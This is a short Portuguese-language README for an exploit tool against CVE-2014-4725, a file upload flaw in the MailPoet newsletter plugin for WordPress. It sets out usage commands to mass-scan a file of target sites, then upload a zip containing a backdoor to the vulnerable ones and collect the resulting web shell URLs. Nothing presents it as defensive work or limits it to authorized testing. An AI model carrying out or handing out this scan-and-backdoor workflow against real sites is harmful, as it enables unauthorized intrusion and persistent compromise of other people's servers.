
MailPoet Newsletters <= Upload Arbitrário de Arquivos (exploiter)
este script é usado para escanear e explorar a vulnerabilidade CVE-2014-4725 (mailpoet/wysija newsletters) no WordPress.
git clone https://github.com/username/CVE-2014-4725.git
cd CVE-2014-4725
pip install requests
escanear alvos
python exploit.py --scan targets.txt
targets.txt contém uma lista de alvos (um por linha, sem http://)
explorar alvos
python exploit.py --exploit vuln.txt --payload file/zip.zip
vuln.txt contém alvos já confirmados como vulneráveis
--payload é o arquivo zip contendo o tema/backdoor a ser enviado
saída
vuln.txt > lista de alvos vulneráveis
shell.txt > urls dos shells enviados